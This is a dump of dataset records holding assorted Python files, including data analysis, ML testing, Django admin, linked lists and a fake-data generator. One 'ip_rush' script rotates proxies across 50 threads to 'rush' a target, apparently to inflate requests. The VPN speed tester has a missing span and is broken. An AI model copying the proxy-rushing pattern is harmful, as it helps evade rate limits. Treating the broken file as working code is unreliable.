df[df['location']=='checkout']['customer_no'].count()\n    print(f'An additional {finalcheckoutcustomers} customers check out at 22:00 on {dayofweek}.')\n\n\ndef statediagram(df):\n    totalcustomers = df['customer_no'].nunique()\n    states = pd.DataFrame(columns=['from','to'])\n    for i in range(totalcustomers):\n        route = df[df['customer_no']==i + 1]['location'].values\n        if route[len(route)-1] != 'checkout':\n            route = np.append(route, 'checkout')\n        for j in range(len(route)-1):\n            states.loc[len(states)] = route[j:j+2]\n    return states\n\n\n#os.chdir('/home/boti/Spiced/git-repos/stochastic-sage-student-code/project_08/')\n\nmonday = pd.read_csv('./monday.csv',sep=';',index_col='timestamp', parse_dates=True)\ntuesday = pd.read_csv('./tuesday.csv',sep=';',index_col='timestamp', parse_dates=True)\nwednesday = pd.read_csv('./wednesday.csv',sep=';',index_col='timestamp', parse_dates=True)\nthursday = pd.read_csv('./thursday.csv',sep=';',index_col='timestamp', parse_dates=True)\nfriday = pd.read_csv('./friday.csv',sep=';',index_col='timestamp', parse_dates=True)\nplotsections(monday,'Monday')\nplotsections(tuesday,'Tuesday')\nplotsections(wednesday,'Wednesday')\nplotsections(thursday,'Thursday')\nplotsections(friday,'Friday')\n\nmonstates = statediagram(monday)\nprint(monstates.groupby(['from'])['to'].value_counts().unstack())\nprint(pd.crosstab(monstates['from'], monstates['to'], normalize=0))","sub_path":"markov-data-boti.py","file_name":"markov-data-boti.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"114856952","text":"import http.client\r\nimport os\r\nimport socket\r\nimport sys\r\nimport threading\r\nimport time\r\nimport traceback\r\n\r\nfrom final_proxy_generator import FinalProxyGenerator\r\nfrom final_rusher import FinalRusher\r\n\r\nclass RushThread(threading.Thread):\r\n    def __init__(self, proxy_generator, rusher):\r\n        super().__init__()\r\n        self.daemon = False\r\n        self._proxy_generator = proxy_generator\r\n        self._rusher = rusher\r\n\r\n    def run(self):\r\n        end_time = time.time() + 7200  # run for at most 2 hours (7200 seconds)\r\n        while time.time() < end_time:\r\n            proxy = self._proxy_generator.NextProxy()\r\n            self._rusher.Rush(proxy)\r\n\r\ndef main():\r\n    NUM_THREADS = 50\r\n    HTTP_TIMEOUT = 30\r\n\r\n    socket.setdefaulttimeout(HTTP_TIMEOUT)  # http timeout\r\n    proxy_generator = FinalProxyGenerator()\r\n    rusher = FinalRusher()\r\n    threads = [RushThread(proxy_generator, rusher) for _ in range(NUM_THREADS)]\r\n    for t in threads:\r\n        t.start()\r\n    for t in threads:\r\n        t.join()\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","sub_path":"ip_rush/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"379538247","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass CreatePlan(Model):\n \"\"\"CreatePlan.\n\n :param description: Description of the plan\n :type description: str\n :param name: Name of the plan to create.\n :type name: str\n :param properties: Plan properties.\n :type properties: object\n :param type: Type of plan to create.\n :type type: object\n \"\"\"\n\n _attribute_map = {\n 'description': {'key': 'description', 'type': 'str'},\n 'name': {'key': 'name', 'type': 'str'},\n 'properties': {'key': 'properties', 'type': 'object'},\n 'type': {'key': 'type', 'type': 'object'}\n }\n\n def __init__(self, description=None, name=None, properties=None, type=None):\n super(CreatePlan, self).__init__()\n self.description = description\n self.name = name\n self.properties = properties\n self.type = type\n","sub_path":"vsts/vsts/work/v4_1/models/create_plan.py","file_name":"create_plan.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"318476284","text":"# # coding=utf-8\n# # author: dlyapun\n\nfrom django.contrib import admin\nfrom my_target.models import *\n\n\nclass MyTargetCampaignAdmin(admin.ModelAdmin):\n list_display = ('campaign_id',\n 'name',\n 'status',\n 'created',\n 'price_per_show',\n 'price_per_click',\n 'budget_limit_day',\n 'budget_limit')\n\n\nclass MyTargetBannerAdmin(admin.ModelAdmin):\n list_display = ('banner_id',\n 'status',\n 'created',\n 'moderation_status',\n 'title',\n 'clicks',\n 'shows',\n 'amount',\n 'ctr',\n 'uniques',\n 'uniques_increment')\n\n\nclass MyTargetAgencyClientAdmin(admin.ModelAdmin):\n list_display = ('username',\n 'client_name',\n 'status',\n 'client_id',\n 'balance',\n 'acc_type',)\n\n\nadmin.site.register(MyTargetCampaign, MyTargetCampaignAdmin)\nadmin.site.register(MyTargetBanner, MyTargetBannerAdmin)\nadmin.site.register(MyTargetAgencyClient, MyTargetAgencyClientAdmin)","sub_path":"my_target/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"534038131","text":"## TestVPNspeed\n## \n# 1. download html source from url\n# 2. parse ip address of pages and stone in sets\n# 3. ping the ip address, get delay time\n# 4. return minial ip\n\nimport urllib2\nimport re\nimport time\nimport os\n\nurl = 'https://www.51vpnn.net/server/query'\n\nr_ip_addr = '(? /Users/tujiankun/Desktop/1.txt'\n os.system(cmd)\n parse_speed(ip)\n\n os.system('rm 1.txt')\n\n\n\n","sub_path":"TestVpnSpeed.py","file_name":"TestVpnSpeed.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"414854155","text":"import NodoSemestre\n\nclass ListaDoble:\n    def __init__(self):\n        self.primero = None\n        self.ultimo = None\n        self.arbolCurso = None\n\n    def insertar(self, dato, dato2):\n        nuevo = NodoSemestre.Nodo(dato, dato2)\n        if self.primero == None:\n            self.primero = nuevo\n            self.ultimo = self.primero\n        else:\n            nuevo.atras = self.ultimo\n            self.ultimo.siguiente = nuevo\n            self.ultimo = nuevo\n\n    def eliminar(self, dato):\n        actual = self.primero\n        eliminado = False\n        if actual is None:\n            eliminado = False\n        elif actual.dato == dato:\n            self.primero = actual.siguiente\n            self.primero.atras = None  # the attribute is 'atras'; 'antras' was a typo that raised AttributeError\n            eliminado = True\n        elif self.ultimo.dato == dato:\n            self.ultimo = self.ultimo.atras\n            self.ultimo.siguiente = None\n            eliminado = True\n        else:\n            while actual:\n                if actual.dato == dato:\n                    actual.atras.siguiente = actual.siguiente\n                    actual.siguiente.atras = actual.atras\n                    eliminado = True\n                actual = actual.siguiente\n\n    def buscar(self, dato):\n        aux = self.primero\n        if aux != None:\n            while aux != None:\n                if dato == aux.dato:\n                    self.arbolCurso = aux.dato2\n                    return aux.dato\n                aux = aux.siguiente\n        else:\n            print(\"the list is empty\")\n\n    def recorrer(self):\n        aux = self.primero\n        if aux != None:\n            while aux != None:\n                print(aux.dato)\n                aux.dato2.print_tree(aux.dato2.root)\n                aux = aux.siguiente\n        else:\n            print(\"the list is empty\")\n","sub_path":"FASE2/PROYECTO/APLICACION/ListaSemestre.py","file_name":"ListaSemestre.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"423934764","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2011-2016, Cédric Krier\n# Copyright (c) 2011-2016, B2CK\n# Copyright (c) 2016-2016, Victor Uriarte\n# and contributors. See AUTHORS for more details.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nfrom sql import Literal, With\n\n\ndef test_update1(table):\n query = table.update([table.c], ['foo'])\n assert str(query) == 'UPDATE \"t\" SET \"c\" = %s'\n assert query.params == ('foo',)\n\n query.where = (table.b == Literal(True))\n assert str(query) == 'UPDATE \"t\" SET \"c\" = %s WHERE (\"t\".\"b\" = %s)'\n assert query.params == ('foo', True)\n\n\ndef test_update2(t1, t2):\n query = t1.update([t1.c], ['foo'], from_=[t2], where=(t1.c == t2.c))\n assert str(query) == ('UPDATE \"t1\" AS \"b\" SET \"c\" = %s '\n 'FROM \"t2\" AS \"a\" WHERE (\"b\".\"c\" = \"a\".\"c\")')\n assert query.params == ('foo',)\n\n\ndef test_update_subselect(t1, t2):\n query_list = t1.update([t1.c], [t2.select(t2.c, where=t2.i == t1.i)])\n query_nolist = t1.update([t1.c], t2.select(t2.c, where=t2.i == t1.i))\n for query in [query_list, query_nolist]:\n assert str(query) == ('UPDATE \"t1\" SET \"c\" = '\n '(SELECT \"b\".\"c\" FROM \"t2\" AS \"b\" '\n 'WHERE (\"b\".\"i\" = \"t1\".\"i\"))')\n assert query.params == ()\n\n\ndef test_update_returning(table):\n query = table.update([table.c], ['foo'], returning=[table.c])\n assert str(query) == 'UPDATE \"t\" SET \"c\" = %s RETURNING \"t\".\"c\"'\n assert query.params == ('foo',)\n\n\ndef test_with(table, t1):\n w = With(query=t1.select(t1.c1))\n\n query = table.update([table.c2], with_=[w],\n values=[w.select(w.c3, where=w.c4 == 2)])\n assert str(query) == ('WITH \"b\" AS '\n '(SELECT \"c\".\"c1\" FROM \"t1\" AS \"c\") '\n 'UPDATE \"t\" SET \"c2\" = '\n '(SELECT \"b\".\"c3\" FROM \"b\" AS \"b\" '\n 'WHERE (\"b\".\"c4\" = %s))')\n assert query.params == (2,)\n","sub_path":"tests/test_update.py","file_name":"test_update.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"123182117","text":"# -*- coding: utf-8 -*-\n'''\nThis module was created and is maintained by hand; it may still have many issues and will keep being maintained.\n'''\nimport sys, os\n\n# append the given content as one line to a file under the output directory\ndef output(content, fileName):\n\troot_dir = os.getcwd()  # root directory of the program\n\tfile_add = os.path.join(root_dir, 'output', fileName)  # no need to hand-check the platform (Windows vs Linux); os.path.join resolves the separator itself\n\tfile = open(file_add, 'a+')\n\tfile.write(str(content) + \"\\n\")\n\tfile.close()","sub_path":"module/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"330164638","text":"from sklearn import datasets\nimport pystan\ndef stan():\n iris = datasets.load_iris()\n X = iris.data[:, :2] # we only take the first two features.\n y = iris.target\n model_code = \"\"\"\n data {\n int K;\n int N;\n int D;\n int y[N];\n vector[D] x[N];\n }\n parameters {\n matrix[K,D] beta;\n }\n model {\n for (k in 1:K)\n beta[k] ~ normal(0, 5);\n for (n in 1:N)\n y[n] ~ categorical(softmax(beta * x[n]));\n }\n\"\"\"\n iris_data = {'N': len(X),\n 'D': 2,\n 'K': 3,\n 'x': X,\n 'y': y}\n sm = pystan.StanModel(model_code=model_code)\n return sm, iris_data\n","sub_path":"ml/ex/stn.py","file_name":"stn.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"46400927","text":"'''\nFunction:\n Implementation of Tester\nAuthor:\n Zhenchao Jin\n'''\nimport os\nimport cv2\nimport copy\nimport torch\nimport pickle\nimport warnings\nimport argparse\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.distributed as dist\nfrom tqdm import tqdm\nfrom configs import BuildConfig\nfrom modules import (\n BuildDataset, BuildDistributedDataloader, BuildDistributedModel, BuildLoss, BuildBackbone, BuildSegmentor, BuildPixelSampler, \n Logger, initslurm, setrandomseed, touchdir, loadckpts, saveckpts, BuildOptimizer, BuildScheduler\n)\nwarnings.filterwarnings('ignore')\n\n\n'''parse arguments in command line'''\ndef parsecmdargs():\n parser = argparse.ArgumentParser(description='SSSegmentation is an open source supervised semantic segmentation toolbox based on PyTorch')\n parser.add_argument('--local_rank', dest='local_rank', help='node rank for distributed testing', default=0, type=int)\n parser.add_argument('--nproc_per_node', dest='nproc_per_node', help='number of process per node', default=8, type=int)\n parser.add_argument('--cfgfilepath', dest='cfgfilepath', help='config file path you want to use', type=str, required=True)\n parser.add_argument('--evalmode', dest='evalmode', help='evaluate mode, support online and offline', default='offline', type=str)\n parser.add_argument('--ckptspath', dest='ckptspath', help='checkpoints you want to resume from', type=str, required=True)\n parser.add_argument('--slurm', dest='slurm', help='please add --slurm if you are using slurm', default=False, action='store_true')\n args = parser.parse_args()\n if args.slurm: initslurm(args, '28000')\n return args\n\n\n'''Tester'''\nclass Tester():\n def __init__(self, cfg, ngpus_per_node, logger_handle, cmd_args, cfg_file_path):\n # set attribute\n self.cfg = cfg\n self.ngpus_per_node = ngpus_per_node\n self.logger_handle = logger_handle\n self.cmd_args = cmd_args\n self.cfg_file_path = cfg_file_path\n assert torch.cuda.is_available(), 'cuda is not available'\n # init distributed training\n dist.init_process_group(backend=self.cfg.SEGMENTOR_CFG.get('backend', 'nccl'))\n # open full fp32\n torch.backends.cuda.matmul.allow_tf32 = False\n torch.backends.cudnn.allow_tf32 = False\n '''start tester'''\n def start(self, all_preds, all_gts):\n cfg, ngpus_per_node, logger_handle, cmd_args, cfg_file_path = self.cfg, self.ngpus_per_node, self.logger_handle, self.cmd_args, self.cfg_file_path\n rank_id = int(os.environ['SLURM_PROCID']) if 'SLURM_PROCID' in os.environ else cmd_args.local_rank\n # build dataset and dataloader\n dataset = BuildDataset(mode='TEST', logger_handle=logger_handle, dataset_cfg=cfg.SEGMENTOR_CFG['dataset'])\n assert dataset.num_classes == cfg.SEGMENTOR_CFG['num_classes'], 'parsed config file %s error' % cfg_file_path\n dataloader_cfg = copy.deepcopy(cfg.SEGMENTOR_CFG['dataloader'])\n expected_total_train_bs_for_assert = dataloader_cfg.pop('expected_total_train_bs_for_assert')\n dataloader_cfg['train']['batch_size'], dataloader_cfg['train']['num_workers'] = dataloader_cfg['train'].pop('batch_size_per_gpu'), dataloader_cfg['train'].pop('num_workers_per_gpu')\n dataloader_cfg['test']['batch_size'], dataloader_cfg['test']['num_workers'] = dataloader_cfg['test'].pop('batch_size_per_gpu'), dataloader_cfg['test'].pop('num_workers_per_gpu')\n assert expected_total_train_bs_for_assert == dataloader_cfg['train']['batch_size'] * ngpus_per_node\n dataloader = BuildDistributedDataloader(dataset=dataset, 
dataloader_cfg=dataloader_cfg['test'])\n # build segmentor\n cfg.SEGMENTOR_CFG['backbone']['pretrained'] = False\n segmentor = BuildSegmentor(segmentor_cfg=copy.deepcopy(cfg.SEGMENTOR_CFG), mode='TEST')\n torch.cuda.set_device(cmd_args.local_rank)\n segmentor.cuda(cmd_args.local_rank)\n # load ckpts\n ckpts = loadckpts(cmd_args.ckptspath)\n try:\n segmentor.load_state_dict(ckpts['model'])\n except Exception as e:\n logger_handle.warning(str(e) + '\\n' + 'Try to load ckpts by using strict=False')\n segmentor.load_state_dict(ckpts['model'], strict=False)\n # parallel\n segmentor = BuildDistributedModel(segmentor, {'device_ids': [cmd_args.local_rank]})\n # print information\n if (cmd_args.local_rank == 0) and (int(os.environ.get('SLURM_PROCID', 0)) == 0):\n logger_handle.info(f'Config file path: {cfg_file_path}')\n logger_handle.info(f'Config details: \\n{cfg.SEGMENTOR_CFG}')\n logger_handle.info(f'Resume from: {cmd_args.ckptspath}')\n # set eval\n segmentor.eval()\n # start to test\n FloatTensor = torch.cuda.FloatTensor\n inference_cfg = copy.deepcopy(cfg.SEGMENTOR_CFG['inference'])\n with torch.no_grad():\n dataloader.sampler.set_epoch(0)\n pbar = tqdm(enumerate(dataloader))\n for batch_idx, samples_meta in pbar:\n pbar.set_description('Processing %s/%s in rank %s' % (batch_idx+1, len(dataloader), rank_id))\n imageids, images, widths, heights, gts = samples_meta['id'], samples_meta['image'], samples_meta['width'], samples_meta['height'], samples_meta['seg_target']\n infer_tricks, align_corners = inference_cfg['tricks'], segmentor.module.align_corners\n cascade_cfg = infer_tricks.get('cascade', {'key_for_pre_output': 'memory_gather_logits', 'times': 1, 'forward_default_args': None})\n for idx in range(cascade_cfg['times']):\n forward_args = None\n if idx > 0: \n outputs_list = [\n F.interpolate(outputs, size=outputs_list[-1].shape[2:], mode='bilinear', align_corners=align_corners) for outputs in outputs_list\n ]\n forward_args = {cascade_cfg['key_for_pre_output']: sum(outputs_list) / len(outputs_list)}\n if cascade_cfg['forward_default_args'] is not None: \n forward_args.update(cascade_cfg['forward_default_args'])\n outputs_list = self.auginference(\n segmentor=segmentor,\n images=images,\n inference_cfg=inference_cfg,\n num_classes=dataset.num_classes,\n FloatTensor=FloatTensor,\n align_corners=align_corners,\n forward_args=forward_args,\n )\n for idx in range(len(outputs_list[0])):\n output = [\n F.interpolate(outputs[idx: idx+1], size=(heights[idx], widths[idx]), mode='bilinear', align_corners=align_corners) for outputs in outputs_list\n ]\n output = sum(output) / len(output)\n pred = (torch.argmax(output[0], dim=0)).cpu().numpy().astype(np.int32)\n all_preds.append([imageids[idx], pred])\n gt = gts[idx].cpu().numpy().astype(np.int32)\n gt[gt >= dataset.num_classes] = -1\n all_gts.append(gt)\n '''inference with augmentations'''\n def auginference(self, segmentor, images, inference_cfg, num_classes, FloatTensor, align_corners, forward_args=None):\n infer_tricks, outputs_list = inference_cfg['tricks'], []\n for scale_factor in infer_tricks['multiscale']:\n images_scale = F.interpolate(images, scale_factor=scale_factor, mode='bilinear', align_corners=align_corners)\n outputs = self.inference(\n segmentor=segmentor, \n images=images_scale.type(FloatTensor), \n inference_cfg=inference_cfg, \n num_classes=num_classes, \n forward_args=forward_args,\n ).cpu()\n outputs_list.append(outputs)\n if infer_tricks['flip']:\n images_flip = torch.from_numpy(np.flip(images_scale.cpu().numpy(), 
axis=3).copy())\n outputs_flip = self.inference(\n segmentor=segmentor, \n images=images_flip.type(FloatTensor), \n inference_cfg=inference_cfg, \n num_classes=num_classes, \n forward_args=forward_args,\n )\n fixed_seg_target_pairs = inference_cfg.get('fixed_seg_target_pairs', None)\n if fixed_seg_target_pairs is None:\n for data_pipeline in self.cfg.SEGMENTOR_CFG['dataset']['train']['data_pipelines']:\n if 'RandomFlip' in data_pipeline: \n fixed_seg_target_pairs = data_pipeline[-1].get('fixed_seg_target_pairs', None)\n if fixed_seg_target_pairs is not None:\n outputs_flip_clone = outputs_flip.data.clone()\n for (pair_a, pair_b) in fixed_seg_target_pairs:\n outputs_flip[:, pair_a, :, :] = outputs_flip_clone[:, pair_b, :, :]\n outputs_flip[:, pair_b, :, :] = outputs_flip_clone[:, pair_a, :, :]\n outputs_flip = torch.from_numpy(np.flip(outputs_flip.cpu().numpy(), axis=3).copy()).type_as(outputs)\n outputs_list.append(outputs_flip)\n return outputs_list\n '''inference'''\n def inference(self, segmentor, images, inference_cfg, num_classes, forward_args=None):\n assert inference_cfg['mode'] in ['whole', 'slide']\n use_probs_before_resize = inference_cfg['tricks']['use_probs_before_resize']\n if inference_cfg['mode'] == 'whole':\n if forward_args is None:\n outputs = segmentor(images)\n else:\n outputs = segmentor(images, **forward_args)\n if use_probs_before_resize:\n outputs = F.softmax(outputs, dim=1)\n else:\n align_corners = segmentor.module.align_corners\n opts = inference_cfg['opts']\n stride_h, stride_w = opts['stride']\n cropsize_h, cropsize_w = opts['cropsize']\n batch_size, _, image_h, image_w = images.size()\n num_grids_h = max(image_h - cropsize_h + stride_h - 1, 0) // stride_h + 1\n num_grids_w = max(image_w - cropsize_w + stride_w - 1, 0) // stride_w + 1\n outputs = images.new_zeros((batch_size, num_classes, image_h, image_w))\n count_mat = images.new_zeros((batch_size, 1, image_h, image_w))\n for h_idx in range(num_grids_h):\n for w_idx in range(num_grids_w):\n x1, y1 = w_idx * stride_w, h_idx * stride_h\n x2, y2 = min(x1 + cropsize_w, image_w), min(y1 + cropsize_h, image_h)\n x1, y1 = max(x2 - cropsize_w, 0), max(y2 - cropsize_h, 0)\n crop_images = images[:, :, y1:y2, x1:x2]\n if forward_args is None:\n outputs_crop = segmentor(crop_images)\n else:\n outputs_crop = segmentor(crop_images, **forward_args)\n outputs_crop = F.interpolate(outputs_crop, size=crop_images.size()[2:], mode='bilinear', align_corners=align_corners)\n if use_probs_before_resize: \n outputs_crop = F.softmax(outputs_crop, dim=1)\n outputs += F.pad(outputs_crop, (int(x1), int(outputs.shape[3] - x2), int(y1), int(outputs.shape[2] - y2)))\n count_mat[:, :, y1:y2, x1:x2] += 1\n assert (count_mat == 0).sum() == 0\n outputs = outputs / count_mat\n return outputs\n\n\n'''main'''\ndef main():\n # parse arguments\n args = parsecmdargs()\n cfg, cfg_file_path = BuildConfig(args.cfgfilepath)\n # touch work dir\n touchdir(cfg.SEGMENTOR_CFG['work_dir'])\n # initialize logger_handle\n logger_handle = Logger(cfg.SEGMENTOR_CFG['logfilepath'])\n # number of gpus, for distribued testing, only support a process for a GPU\n ngpus_per_node = torch.cuda.device_count()\n if ngpus_per_node != args.nproc_per_node:\n if (args.local_rank == 0) and (int(os.environ.get('SLURM_PROCID', 0)) == 0):\n logger_handle.warning('ngpus_per_node is not equal to nproc_per_node, force ngpus_per_node = nproc_per_node by default')\n ngpus_per_node = args.nproc_per_node\n # instanced Tester\n all_preds, all_gts = [], []\n client = Tester(cfg=cfg, 
ngpus_per_node=ngpus_per_node, logger_handle=logger_handle, cmd_args=args, cfg_file_path=cfg_file_path)\n client.start(all_preds, all_gts)\n # save results and evaluate\n rank_id = int(os.environ['SLURM_PROCID']) if 'SLURM_PROCID' in os.environ else args.local_rank\n work_dir = cfg.SEGMENTOR_CFG['work_dir']\n filename = cfg.SEGMENTOR_CFG['resultsavepath'].split('/')[-1].split('.')[0] + f'_{rank_id}.' + cfg.SEGMENTOR_CFG['resultsavepath'].split('.')[-1]\n with open(os.path.join(work_dir, filename), 'wb') as fp:\n pickle.dump([all_preds, all_gts], fp)\n rank = torch.tensor([rank_id], device='cuda')\n rank_list = [rank.clone() for _ in range(args.nproc_per_node)]\n dist.all_gather(rank_list, rank)\n logger_handle.info('Rank %s finished' % int(rank.item()))\n if (args.local_rank == 0) and (int(os.environ.get('SLURM_PROCID', 0)) == 0):\n all_preds_gather, all_gts_gather = [], []\n for rank in rank_list:\n rank = str(int(rank.item()))\n filename = cfg.SEGMENTOR_CFG['resultsavepath'].split('/')[-1].split('.')[0] + f'_{rank}.' + cfg.SEGMENTOR_CFG['resultsavepath'].split('.')[-1]\n fp = open(os.path.join(work_dir, filename), 'rb')\n all_preds, all_gts = pickle.load(fp)\n all_preds_gather += all_preds\n all_gts_gather += all_gts\n all_preds, all_gts = all_preds_gather, all_gts_gather\n all_preds_filtered, all_gts_filtered, all_ids = [], [], []\n for idx, pred in enumerate(all_preds):\n if pred[0] in all_ids: \n continue\n all_ids.append(pred[0])\n all_preds_filtered.append(pred[1])\n all_gts_filtered.append(all_gts[idx])\n all_preds, all_gts = all_preds_filtered, all_gts_filtered\n logger_handle.info('All Finished, all_preds: %s, all_gts: %s' % (len(all_preds), len(all_gts)))\n dataset = BuildDataset(mode='TEST', logger_handle=logger_handle, dataset_cfg=cfg.SEGMENTOR_CFG['dataset'])\n if args.evalmode == 'offline':\n result = dataset.evaluate(\n seg_preds=all_preds, \n seg_targets=all_gts, \n metric_list=cfg.SEGMENTOR_CFG['inference'].get('metric_list', ['iou', 'miou']),\n num_classes=cfg.SEGMENTOR_CFG['num_classes'],\n ignore_index=-1,\n )\n logger_handle.info(result)\n else:\n dataset.formatresults(all_preds, all_ids, savedir=os.path.join(work_dir, 'results'))\n\n\n'''debug'''\nif __name__ == '__main__':\n with torch.no_grad():\n main()","sub_path":"ssseg/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":15150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
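The `slide` branch of `Tester.inference` above is easier to follow in isolation: tile the image with fixed-size crops, clamp the last row and column of crops back inside the image, and average logits wherever crops overlap. Below is a minimal sketch under the assumption that `segmentor` is any callable mapping `BxCxHxW` images to `BxKxHxW` logits; the helper name is illustrative, not part of SSSegmentation's API.

```python
import torch
import torch.nn.functional as F

def slide_inference(segmentor, images, num_classes, cropsize, stride):
    batch, _, h, w = images.shape
    ch, cw = cropsize
    sh, sw = stride
    logits = images.new_zeros((batch, num_classes, h, w))
    counts = images.new_zeros((batch, 1, h, w))
    grids_h = max(h - ch + sh - 1, 0) // sh + 1
    grids_w = max(w - cw + sw - 1, 0) // sw + 1
    for i in range(grids_h):
        for j in range(grids_w):
            y1, x1 = i * sh, j * sw
            y2, x2 = min(y1 + ch, h), min(x1 + cw, w)
            y1, x1 = max(y2 - ch, 0), max(x2 - cw, 0)  # keep full-size crops at the borders
            out = segmentor(images[:, :, y1:y2, x1:x2])
            # pad the crop's logits back to full resolution, then accumulate
            logits += F.pad(out, (x1, w - x2, y1, h - y2))
            counts[:, :, y1:y2, x1:x2] += 1
    assert not (counts == 0).any()  # the grid must cover every pixel
    return logits / counts          # overlapping windows are averaged

# demo with a dummy one-class "segmentor"
demo = slide_inference(lambda x: x.mean(1, keepdim=True), torch.rand(2, 3, 90, 120), 1, (64, 64), (42, 42))
print(demo.shape)  # torch.Size([2, 1, 90, 120])
```

Dividing by `counts` is what turns the overlapping strides into a cheap test-time ensemble at window borders.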
+{"seq_id":"431657946","text":"import os\nimport wget\nimport json\n\n# {lat,lon} 36.2072735, -79.8184574\ndef construct_url(type, coords):\n url = \"https://api.weather.gov/\"\n url = f\"{url}{type}/{coords[0]},{coords[1]}\"\n print(url)\n return url\n\ndef url_request(url, coords):\n filename = wget.download(url, out=f\"weatherpoint_{coords[0]}_{coords[1]}\")\n return filename\n\n\ncoords = [36.2072735,-79.8184574]\nurl = construct_url(\"points\", coords)\nfilename = url_request(url, coords)\n\n\nwith open(filename) as f:\n data = json.load(f)\n\nprint(json.dumps(data, indent = 4, sort_keys=True))\nprint(\"____________________________\")\nzone = data['properties']['forecast']\nprint(zone)\n\nfilename_grid = wget.download(zone, out=\"gridforcast\")\n","sub_path":"Research Work/Weather/calls.py","file_name":"calls.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"380403634","text":"import random\nimport sqlite3\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import List, Type, Union\n\nfrom loguru import logger\nfrom lorem_text import lorem\n\nrandom.seed(420)\n\n# Source: https://github.com/smashew/NameDatabases\nthis_folder = Path(__file__).parent\nwith (this_folder / 'first_names.txt').open() as f:\n first_names = [i.strip() for i in f.readlines()]\nwith (this_folder / 'last_names.txt').open() as f:\n last_names = [i.strip() for i in f.readlines()]\n\n\ndef generate_name() -> str:\n first = random.randint(0, len(first_names))\n last = random.randint(0, len(last_names))\n first_name = first_names[first]\n last_name = last_names[last]\n return f'{first_name} {last_name}'\n\n\ndef generate_int() -> int:\n return random.randint(1000, 2_000_000)\n\n\ndef generate_float() -> float:\n return random.uniform(1000, 2_000_000)\n\n\ndef generate_year() -> int:\n return random.randint(1980, 1999)\n\n\ndef generate_bool() -> bool:\n return bool(random.randint(0, 1))\n\n\ndef generate_text() -> str:\n return lorem.words(2)\n\n\nclass SqlMetaclass:\n @classmethod\n def create_table(cls, db: sqlite3.Connection):\n \"\"\"\n a = A()\n a.create_table(db)\n \"\"\"\n database_column_types = {\n str: 'TEXT',\n int: 'INT',\n float: 'REAL',\n bool: 'BOOLEAN',\n }\n columns = [\n f'{column_name} {database_column_types[column_type]}'\n for column_name, column_type in cls.__annotations__.items()\n ]\n columns_joined = ', '.join(columns)\n logger.info(f'Creating table {cls.__name__} with columns ({columns_joined})')\n db.execute(f\"\"\"\n CREATE TABLE {cls.__name__} ({columns_joined})\n \"\"\")\n # db.commit()\n\n @classmethod\n def generate_data(cls, db: sqlite3.Connection, amount: int = 1):\n name_fields = {'artist_name'}\n rows: List[List[Union[float, bool, str]]] = []\n # TODO Overlapping items\n for _ in range(amount):\n row_entry: List[Union[float, bool, str]] = []\n for column_name, column_type in cls.__annotations__.items():\n if column_name in name_fields:\n row_entry.append(generate_name())\n elif 'year' in column_name:\n 